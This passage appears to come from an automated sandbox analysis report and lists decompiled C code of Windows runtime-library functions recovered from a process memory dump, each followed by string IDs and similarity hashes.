                                                                                  													}
                                                                                  												}
                                                                                  											}
                                                                                  											L33:
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						L35:
                                                                                  						return _t77;
                                                                                  					} else {
                                                                                  						 *_t75 = 0xf97b80;
                                                                                  						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                                                  						 *_t134 = _t75;
                                                                                  						 *0xf97b84 = _t75;
                                                                                  						_t73 = E00EBEB70(_t134, 0xf97b60);
                                                                                  						if( *0xf97b20 != 0) {
                                                                                  							_t73 =  *( *[fs:0x30] + 0xc);
                                                                                  							if( *((char*)(_t73 + 0x28)) == 0) {
                                                                                  								_t73 = E00EBFF60( *0xf97b20);
                                                                                  							}
                                                                                  						}
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  			}


















































                                                                                  Strings
                                                                                  • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 00F1BE0F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                  • API String ID: 0-865735534
                                                                                  • Opcode ID: 8d68dc1f964b0ee813bf9682b6482c4d042cc218caa8976200b4579aeeefcff7
                                                                                  • Instruction ID: 5b5477b06cc7aa8e2998e13e45a63e25887ca1e1403e571640cbba44ed4cd92d
                                                                                  • Opcode Fuzzy Hash: 8d68dc1f964b0ee813bf9682b6482c4d042cc218caa8976200b4579aeeefcff7
                                                                                  • Instruction Fuzzy Hash: 6BA1FF31B1060ACBDB25DB68C850BEAB3A5EF48724F14557BE846EB791DB30DD429B80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 63%
                                                                                  			E00EA2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                                                  				signed char _v8;
                                                                                  				signed int _v12;
                                                                                  				signed int _v16;
                                                                                  				signed int _v20;
                                                                                  				signed int _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				signed int _v52;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				intOrPtr _t55;
                                                                                  				signed int _t57;
                                                                                  				signed int _t58;
                                                                                  				char* _t62;
                                                                                  				signed char* _t63;
                                                                                  				signed char* _t64;
                                                                                  				signed int _t67;
                                                                                  				signed int _t72;
                                                                                  				signed int _t77;
                                                                                  				signed int _t78;
                                                                                  				signed int _t88;
                                                                                  				intOrPtr _t89;
                                                                                  				signed char _t93;
                                                                                  				signed int _t97;
                                                                                  				signed int _t98;
                                                                                  				signed int _t102;
                                                                                  				signed int _t103;
                                                                                  				intOrPtr _t104;
                                                                                  				signed int _t105;
                                                                                  				signed int _t106;
                                                                                  				signed char _t109;
                                                                                  				signed int _t111;
                                                                                  				void* _t116;
                                                                                  
                                                                                  				_t102 = __edi;
                                                                                  				_t97 = __edx;
                                                                                  				_v12 = _v12 & 0x00000000;
                                                                                  				_t55 =  *[fs:0x18];
                                                                                  				_t109 = __ecx;
                                                                                  				_v8 = __edx;
                                                                                  				_t86 = 0;
                                                                                  				_v32 = _t55;
                                                                                  				_v24 = 0;
                                                                                  				_push(__edi);
                                                                                  				if(__ecx == 0xf95350) {
                                                                                  					_t86 = 1;
                                                                                  					_v24 = 1;
                                                                                  					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                                                  				}
                                                                                  				_t103 = _t102 | 0xffffffff;
                                                                                  				if( *0xf97bc8 != 0) {
                                                                                  					_push(0xc000004b);
                                                                                  					_push(_t103);
                                                                                  					E00EE97C0();
                                                                                  				}
                                                                                  				if( *0xf979c4 != 0) {
                                                                                  					_t57 = 0;
                                                                                  				} else {
                                                                                  					_t57 = 0xf979c8;
                                                                                  				}
                                                                                  				_v16 = _t57;
                                                                                  				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                                                  					_t93 = _t109;
                                                                                  					L23();
                                                                                  				}
                                                                                  				_t58 =  *_t109;
                                                                                  				if(_t58 == _t103) {
                                                                                  					__eflags =  *(_t109 + 0x14) & L"ersists, try restarting the physical computer.\r\n";
                                                                                  					_t58 = _t103;
                                                                                  					if(__eflags == 0) {
                                                                                  						_t93 = _t109;
                                                                                  						E00ED1624(_t86, __eflags);
                                                                                  						_t58 =  *_t109;
                                                                                  					}
                                                                                  				}
                                                                                  				_v20 = _v20 & 0x00000000;
                                                                                  				if(_t58 != _t103) {
                                                                                  					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                                                  				}
                                                                                  				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                                                  				_t88 = _v16;
                                                                                  				_v28 = _t104;
                                                                                  				L9:
                                                                                  				while(1) {
                                                                                  					if(E00EC7D50() != 0) {
                                                                                  						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                                                  					} else {
                                                                                  						_t62 = 0x7ffe0382;
                                                                                  					}
                                                                                  					if( *_t62 != 0) {
                                                                                  						_t63 =  *[fs:0x30];
                                                                                  						__eflags = _t63[0x240] & 0x00000002;
                                                                                  						if((_t63[0x240] & 0x00000002) != 0) {
                                                                                  							_t93 = _t109;
                                                                                  							E00F3FE87(_t93);
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t104 != 0xffffffff) {
                                                                                  						_push(_t88);
                                                                                  						_push(0);
                                                                                  						_push(_t104);
                                                                                  						_t64 = E00EE9520();
                                                                                  						goto L15;
                                                                                  					} else {
                                                                                  						while(1) {
                                                                                  							_t97 =  &_v8;
                                                                                  							_t64 = E00EDE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                                                  							if(_t64 == 0x102) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t93 =  *(_t109 + 4);
                                                                                  							_v8 = _t93;
                                                                                  							if((_t93 & 0x00000002) != 0) {
                                                                                  								continue;
                                                                                  							}
                                                                                  							L15:
                                                                                  							if(_t64 == 0x102) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t89 = _v24;
                                                                                  							if(_t64 < 0) {
                                                                                  								L00EFDF30(_t93, _t97, _t64);
                                                                                  								_push(_t93);
                                                                                  								_t98 = _t97 | 0xffffffff;
                                                                                  								__eflags =  *0xf96901;
                                                                                  								_push(_t109);
                                                                                  								_v52 = _t98;
                                                                                  								if( *0xf96901 != 0) {
                                                                                  									_push(0);
                                                                                  									_push(1);
                                                                                  									_push(0);
                                                                                  									_push(0x100003);
                                                                                  									_push( &_v12);
                                                                                  									_t72 = E00EE9980();
                                                                                  									__eflags = _t72;
                                                                                  									if(_t72 < 0) {
                                                                                  										_v12 = _t98 | 0xffffffff;
                                                                                  									}
                                                                                  								}
                                                                                  								asm("lock cmpxchg [ecx], edx");
                                                                                  								_t111 = 0;
                                                                                  								__eflags = 0;
                                                                                  								if(0 != 0) {
                                                                                  									__eflags = _v12 - 0xffffffff;
                                                                                  									if(_v12 != 0xffffffff) {
                                                                                  										_push(_v12);
                                                                                  										E00EE95D0();
                                                                                  									}
                                                                                  								} else {
                                                                                  									_t111 = _v12;
                                                                                  								}
                                                                                  								return _t111;
                                                                                  							} else {
                                                                                  								if(_t89 != 0) {
                                                                                  									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                                                  									_t77 = E00EC7D50();
                                                                                  									__eflags = _t77;
                                                                                  									if(_t77 == 0) {
                                                                                  										_t64 = 0x7ffe0384;
                                                                                  									} else {
                                                                                  										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                  									}
                                                                                  									__eflags =  *_t64;
                                                                                  									if( *_t64 != 0) {
                                                                                  										_t64 =  *[fs:0x30];
                                                                                  										__eflags = _t64[0x240] & 0x00000004;
                                                                                  										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                  											_t78 = E00EC7D50();
                                                                                  											__eflags = _t78;
                                                                                  											if(_t78 == 0) {
                                                                                  												_t64 = 0x7ffe0385;
                                                                                  											} else {
                                                                                  												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                  											}
                                                                                  											__eflags =  *_t64 & 0x00000020;
                                                                                  											if(( *_t64 & 0x00000020) != 0) {
                                                                                  												_t64 = E00F27016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								return _t64;
                                                                                  							}
                                                                                  						}
                                                                                  						_t97 = _t88;
                                                                                  						_t93 = _t109;
                                                                                  						E00F3FDDA(_t97, _v12);
                                                                                  						_t105 =  *_t109;
                                                                                  						_t67 = _v12 + 1;
                                                                                  						_v12 = _t67;
                                                                                  						__eflags = _t105 - 0xffffffff;
                                                                                  						if(_t105 == 0xffffffff) {
                                                                                  							_t106 = 0;
                                                                                  							__eflags = 0;
                                                                                  						} else {
                                                                                  							_t106 =  *(_t105 + 0x14);
                                                                                  						}
                                                                                  						__eflags = _t67 - 2;
                                                                                  						if(_t67 > 2) {
                                                                                  							__eflags = _t109 - 0xf95350;
                                                                                  							if(_t109 != 0xf95350) {
                                                                                  								__eflags = _t106 - _v20;
                                                                                  								if(__eflags == 0) {
                                                                                  									_t93 = _t109;
                                                                                  									E00F3FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						_push("RTL: Re-Waiting\n");
                                                                                  						_push(0);
                                                                                  						_push(0x65);
                                                                                  						_v20 = _t106;
                                                                                  						E00F35720();
                                                                                  						_t104 = _v28;
                                                                                  						_t116 = _t116 + 0xc;
                                                                                  						continue;
                                                                                  					}
                                                                                  				}
                                                                                  			}




































                                                                                  0x00effb18
                                                                                  0x00effb1e
                                                                                  0x00effb21
                                                                                  0x00effb21
                                                                                  0x00ea2ece
                                                                                  0x00ea2ece
                                                                                  0x00ea2ece
                                                                                  0x00ea2ed7
                                                                                  0x00ea2e61
                                                                                  0x00ea2e63
                                                                                  0x00effa6b
                                                                                  0x00effa71
                                                                                  0x00effa76
                                                                                  0x00effa78
                                                                                  0x00effa8a
                                                                                  0x00effa7a
                                                                                  0x00effa83
                                                                                  0x00effa83
                                                                                  0x00effa8f
                                                                                  0x00effa91
                                                                                  0x00effa97
                                                                                  0x00effa9d
                                                                                  0x00effaa4
                                                                                  0x00effaaa
                                                                                  0x00effaaf
                                                                                  0x00effab1
                                                                                  0x00effac3
                                                                                  0x00effab3
                                                                                  0x00effabc
                                                                                  0x00effabc
                                                                                  0x00effac8
                                                                                  0x00effacb
                                                                                  0x00effadf
                                                                                  0x00effadf
                                                                                  0x00effacb
                                                                                  0x00effaa4
                                                                                  0x00effa91
                                                                                  0x00ea2e6f
                                                                                  0x00ea2e6f
                                                                                  0x00ea2e5f
                                                                                  0x00effa13
                                                                                  0x00effa15
                                                                                  0x00effa17
                                                                                  0x00effa1f
                                                                                  0x00effa21
                                                                                  0x00effa22
                                                                                  0x00effa25
                                                                                  0x00effa28
                                                                                  0x00effa2f
                                                                                  0x00effa2f
                                                                                  0x00effa2a
                                                                                  0x00effa2a
                                                                                  0x00effa2a
                                                                                  0x00effa31
                                                                                  0x00effa34
                                                                                  0x00effa36
                                                                                  0x00effa3c
                                                                                  0x00effa3e
                                                                                  0x00effa41
                                                                                  0x00effa43
                                                                                  0x00effa45
                                                                                  0x00effa45
                                                                                  0x00effa41
                                                                                  0x00effa3c
                                                                                  0x00effa4a
                                                                                  0x00effa4f
                                                                                  0x00effa51
                                                                                  0x00effa53
                                                                                  0x00effa56
                                                                                  0x00effa5b
                                                                                  0x00effa5e
                                                                                  0x00000000
                                                                                  0x00effa5e
                                                                                  0x00ea2e23

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RTL: Re-Waiting
                                                                                  • API String ID: 0-316354757
                                                                                  • Opcode ID: 16d2a501f9eddbddf3953ad37332af3ecb9108e2e51d293ab620afe12c378ce3
                                                                                  • Instruction ID: 02808db0a9032d82f0ac768b63bbba09300f7cc35282f778a650e84612823707
                                                                                  • Opcode Fuzzy Hash: 16d2a501f9eddbddf3953ad37332af3ecb9108e2e51d293ab620afe12c378ce3
                                                                                  • Instruction Fuzzy Hash: F9613830A006089FDB22DF6CC840B7E77E1EF4A718F2462A9E615BB2D2C774AD419791
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 80%
                                                                                  			E00F70EA5(void* __ecx, void* __edx) {
                                                                                  				signed int _v20;
                                                                                  				char _v24;
                                                                                  				intOrPtr _v28;
                                                                                  				unsigned int _v32;
                                                                                  				signed int _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				char _v44;
                                                                                  				intOrPtr _v64;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				signed int _t58;
                                                                                  				unsigned int _t60;
                                                                                  				intOrPtr _t62;
                                                                                  				char* _t67;
                                                                                  				char* _t69;
                                                                                  				void* _t80;
                                                                                  				void* _t83;
                                                                                  				intOrPtr _t93;
                                                                                  				intOrPtr _t115;
                                                                                  				char _t117;
                                                                                  				void* _t120;
                                                                                  
                                                                                  				_t83 = __edx;
                                                                                  				_t117 = 0;
                                                                                  				_t120 = __ecx;
                                                                                  				_v44 = 0;
                                                                                  				if(E00F6FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                  					L24:
                                                                                  					_t109 = _v44;
                                                                                  					if(_v44 != 0) {
                                                                                  						E00F71074(_t83, _t120, _t109, _t117, _t117);
                                                                                  					}
                                                                                  					L26:
                                                                                  					return _t117;
                                                                                  				}
                                                                                  				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                  				_t5 = _t83 + 1; // 0x1
                                                                                  				_v36 = _t5 << 0xc;
                                                                                  				_v40 = _t93;
                                                                                  				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                  				asm("sbb ebx, ebx");
                                                                                  				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                  				if(_t58 != 0) {
                                                                                  					_push(0);
                                                                                  					_push(0x14);
                                                                                  					_push( &_v24);
                                                                                  					_push(3);
                                                                                  					_push(_t93);
                                                                                  					_push(0xffffffff);
                                                                                  					_t80 = E00EE9730();
                                                                                  					_t115 = _v64;
                                                                                  					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                  						_push(_t93);
                                                                                  						E00F6A80D(_t115, 1, _v20, _t117);
                                                                                  						_t83 = 4;
                                                                                  					}
                                                                                  				}
                                                                                  				if(E00F6A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                  					goto L24;
                                                                                  				}
                                                                                  				_t60 = _v32;
                                                                                  				_t97 = (_t60 != 0x100000) + 1;
                                                                                  				_t83 = (_v44 -  *0xf98b04 >> 0x14) + (_v44 -  *0xf98b04 >> 0x14);
                                                                                  				_v28 = (_t60 != 0x100000) + 1;
                                                                                  				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                  				_v40 = _t62;
                                                                                  				if(_t83 >= _t62) {
                                                                                  					L10:
                                                                                  					asm("lock xadd [eax], ecx");
                                                                                  					asm("lock xadd [eax], ecx");
                                                                                  					if(E00EC7D50() == 0) {
                                                                                  						_t67 = 0x7ffe0380;
                                                                                  					} else {
                                                                                  						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                  					}
                                                                                  					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                  						E00F6138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                  					}
                                                                                  					if(E00EC7D50() == 0) {
                                                                                  						_t69 = 0x7ffe0388;
                                                                                  					} else {
                                                                                  						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                  					}
                                                                                  					if( *_t69 != 0) {
                                                                                  						E00F5FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                  					}
                                                                                  					if(( *0xf98724 & 0x00000008) != 0) {
                                                                                  						E00F652F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                  					}
                                                                                  					_t117 = _v44;
                                                                                  					goto L26;
                                                                                  				}
                                                                                  				while(E00F715B5(0xf98ae4, _t83, _t97, _t97) >= 0) {
                                                                                  					_t97 = _v28;
                                                                                  					_t83 = _t83 + 2;
                                                                                  					if(_t83 < _v40) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				goto L24;
                                                                                  			}

























                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `
                                                                                  • API String ID: 0-2679148245
                                                                                  • Opcode ID: 8308766dd9510a1a7f4f5251da75dff803b10c3902c6220d2b298f1c45a0ff52
                                                                                  • Instruction ID: be494c701d3742e855614c41220a010dc859f24ccb2e615d64112380fb0fd8d7
                                                                                  • Opcode Fuzzy Hash: 8308766dd9510a1a7f4f5251da75dff803b10c3902c6220d2b298f1c45a0ff52
                                                                                  • Instruction Fuzzy Hash: EC51AC712043419BD324DF28D881F1BB7E5FFC4714F04492EF98A97291DA35E94ADB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E00EDF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				char* _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				char _v36;
                                                                                  				char _v44;
                                                                                  				char _v52;
                                                                                  				intOrPtr _v56;
                                                                                  				char _v60;
                                                                                  				intOrPtr _v72;
                                                                                  				void* _t51;
                                                                                  				void* _t58;
                                                                                  				signed short _t82;
                                                                                  				short _t84;
                                                                                  				signed int _t91;
                                                                                  				signed int _t100;
                                                                                  				signed short* _t103;
                                                                                  				void* _t108;
                                                                                  				intOrPtr* _t109;
                                                                                  
                                                                                  				_t103 = __ecx;
                                                                                  				_t82 = __edx;
                                                                                  				_t51 = E00EC4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                  				if(_t51 >= 0) {
                                                                                  					_push(0x21);
                                                                                  					_push(3);
                                                                                  					_v56 =  *0x7ffe02dc;
                                                                                  					_v20 =  &_v52;
                                                                                  					_push( &_v44);
                                                                                  					_v28 = 0x18;
                                                                                  					_push( &_v28);
                                                                                  					_push(0x100020);
                                                                                  					_v24 = 0;
                                                                                  					_push( &_v60);
                                                                                  					_v16 = 0x40;
                                                                                  					_v12 = 0;
                                                                                  					_v8 = 0;
                                                                                  					_t58 = E00EE9830();
                                                                                  					_t87 =  *[fs:0x30];
                                                                                  					_t108 = _t58;
                                                                                  					L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                  					if(_t108 < 0) {
                                                                                  						L11:
                                                                                  						_t51 = _t108;
                                                                                  					} else {
                                                                                  						_push(4);
                                                                                  						_push(8);
                                                                                  						_push( &_v36);
                                                                                  						_push( &_v44);
                                                                                  						_push(_v60);
                                                                                  						_t108 = E00EE9990();
                                                                                  						if(_t108 < 0) {
                                                                                  							L10:
                                                                                  							_push(_v60);
                                                                                  							E00EE95D0();
                                                                                  							goto L11;
                                                                                  						} else {
                                                                                  							_t109 = L00EC4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                                                  							if(_t109 == 0) {
                                                                                  								_t108 = 0xc0000017;
                                                                                  								goto L10;
                                                                                  							} else {
                                                                                  								_t21 = _t109 + 0x18; // 0x18
                                                                                  								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                  								 *_t109 = 1;
                                                                                  								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                  								 *(_t109 + 0xe) = _t82;
                                                                                  								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                  								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                  								E00EEF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                                                  								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                  								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                  								_t91 =  *_t103 & 0x0000ffff;
                                                                                  								_t100 = _t91 & 0xfffffffe;
                                                                                  								_t84 = 0x5c;
                                                                                  								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                                                  									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                  										_push(_v60);
                                                                                  										E00EE95D0();
                                                                                  										L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                  										_t51 = 0xc0000106;
                                                                                  									} else {
                                                                                  										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                  										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                  										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                  										goto L5;
                                                                                  									}
                                                                                  								} else {
                                                                                  									L5:
                                                                                  									 *_a4 = _t109;
                                                                                  									_t51 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t51;
                                                                                  			}


























                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @
                                                                                  • API String ID: 0-2766056989
                                                                                  • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                  • Instruction ID: b063634b066a438391007321096a70486ec251a4aaf9086483cccab1ba5a672b
                                                                                  • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                  • Instruction Fuzzy Hash: C8519D715047149FC320DF29C841A6BBBF8FF48710F00892EF99697691E7B4E945CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 75%
                                                                                  			E00F23540(intOrPtr _a4) {
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v88;
                                                                                  				intOrPtr _v92;
                                                                                  				char _v96;
                                                                                  				char _v352;
                                                                                  				char _v1072;
                                                                                  				intOrPtr _v1140;
                                                                                  				intOrPtr _v1148;
                                                                                  				char _v1152;
                                                                                  				char _v1156;
                                                                                  				char _v1160;
                                                                                  				char _v1164;
                                                                                  				char _v1168;
                                                                                  				char* _v1172;
                                                                                  				short _v1174;
                                                                                  				char _v1176;
                                                                                  				char _v1180;
                                                                                  				char _v1192;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				void* __ebp;
                                                                                  				short _t41;
                                                                                  				short _t42;
                                                                                  				intOrPtr _t80;
                                                                                  				intOrPtr _t81;
                                                                                  				signed int _t82;
                                                                                  				void* _t83;
                                                                                  
                                                                                  				_v12 =  *0xf9d360 ^ _t82;
                                                                                  				_t41 = 0x14;
                                                                                  				_v1176 = _t41;
                                                                                  				_t42 = 0x16;
                                                                                  				_v1174 = _t42;
                                                                                  				_v1164 = 0x100;
                                                                                  				_v1172 = L"BinaryHash";
                                                                                  				_t81 = E00EE0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                  				if(_t81 < 0) {
                                                                                  					L11:
                                                                                  					_t75 = _t81;
                                                                                  					E00F23706(0, _t81, _t79, _t80);
                                                                                  					L12:
                                                                                  					if(_a4 != 0xc000047f) {
                                                                                  						E00EEFA60( &_v1152, 0, 0x50);
                                                                                  						_v1152 = 0x60c201e;
                                                                                  						_v1148 = 1;
                                                                                  						_v1140 = E00F23540;
                                                                                  						E00EEFA60( &_v1072, 0, 0x2cc);
                                                                                  						_push( &_v1072);
                                                                                  						E00EFDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                  						E00F30C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                  						_push(_v1152);
                                                                                  						_push(0xffffffff);
                                                                                  						E00EE97C0();
                                                                                  					}
                                                                                  					return E00EEB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                  				}
                                                                                  				_t79 =  &_v352;
                                                                                  				_t81 = E00F23971(0, _a4,  &_v352,  &_v1156);
                                                                                  				if(_t81 < 0) {
                                                                                  					goto L11;
                                                                                  				}
                                                                                  				_t75 = _v1156;
                                                                                  				_t79 =  &_v1160;
                                                                                  				_t81 = E00F23884(_v1156,  &_v1160,  &_v1168);
                                                                                  				if(_t81 >= 0) {
                                                                                  					_t80 = _v1160;
                                                                                  					E00EEFA60( &_v96, 0, 0x50);
                                                                                  					_t83 = _t83 + 0xc;
                                                                                  					_push( &_v1180);
                                                                                  					_push(0x50);
                                                                                  					_push( &_v96);
                                                                                  					_push(2);
                                                                                  					_push( &_v1176);
                                                                                  					_push(_v1156);
                                                                                  					_t81 = E00EE9650();
                                                                                  					if(_t81 >= 0) {
                                                                                  						if(_v92 != 3 || _v88 == 0) {
                                                                                  							_t81 = 0xc000090b;
                                                                                  						}
                                                                                  						if(_t81 >= 0) {
                                                                                  							_t75 = _a4;
                                                                                  							_t79 =  &_v352;
                                                                                  							E00F23787(_a4,  &_v352, _t80);
                                                                                  						}
                                                                                  					}
                                                                                  					L00EC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                  				}
                                                                                  				_push(_v1156);
                                                                                  				E00EE95D0();
                                                                                  				if(_t81 >= 0) {
                                                                                  					goto L12;
                                                                                  				} else {
                                                                                  					goto L11;
                                                                                  				}
                                                                                  			}































                                                                                  0x00f23657
                                                                                  0x00f23657
                                                                                  0x00f2365c
                                                                                  0x00f23662
                                                                                  0x00f23669
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.295185036.0000000000E80000.00000040.00000001.sdmp, Offset: 00E80000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: 8cadafcabf5495b5a0a6f6ee9433761e10526a40563cde8a735e6491d84298c8
                                                                                  • Instruction ID: cf2c93eaa132bb95e683777b176a23a5f3814c99aa4f8ef3cd00f77b6fa0e11b
                                                                                  • Opcode Fuzzy Hash: 8cadafcabf5495b5a0a6f6ee9433761e10526a40563cde8a735e6491d84298c8
                                                                                  • Instruction Fuzzy Hash: 0E4140F2D0053DABDB219A50DC81FAEB77CAB44714F0045A5EA08AB241DB349F889FA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 71%
                                                                                  			E00F705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                  				signed int _v20;
                                                                                  				char _v24;
                                                                                  				signed int _v28;
                                                                                  				char _v32;
                                                                                  				signed int _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				void* __ebx;
                                                                                  				void* _t35;
                                                                                  				signed int _t42;
                                                                                  				char* _t48;
                                                                                  				signed int _t59;
                                                                                  				signed char _t61;
                                                                                  				signed int* _t79;
                                                                                  				void* _t88;
                                                                                  
                                                                                  				_v28 = __edx;
                                                                                  				_t79 = __ecx;
                                                                                  				if(E00F707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                  					L13:
                                                                                  					_t35 = 0;
                                                                                  					L14:
                                                                                  					return _t35;
                                                                                  				}
                                                                                  				_t61 = __ecx[1];
                                                                                  				_t59 = __ecx[0xf];
                                                                                  				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                  				_v36 = _a8 << 0xc;
                                                                                  				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                  				asm("sbb esi, esi");
                                                                                  				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                  				if(_t42 != 0) {
                                                                                  					_push(0);
                                                                                  					_push(0x14);
                                                                                  					_push( &_v24);
                                                                                  					_push(3);
                                                                                  					_push(_t59);
                                                                                  					_push(0xffffffff);
                                                                                  					if(E00EE9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                  						_push(_t61);
                                                                                  						E00F6A80D(_t59, 1, _v20, 0);
                                                                                  						_t88 = 4;
                                                                                  					}
                                                                                  				}
                                                                                  				_t35 = E00F6A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
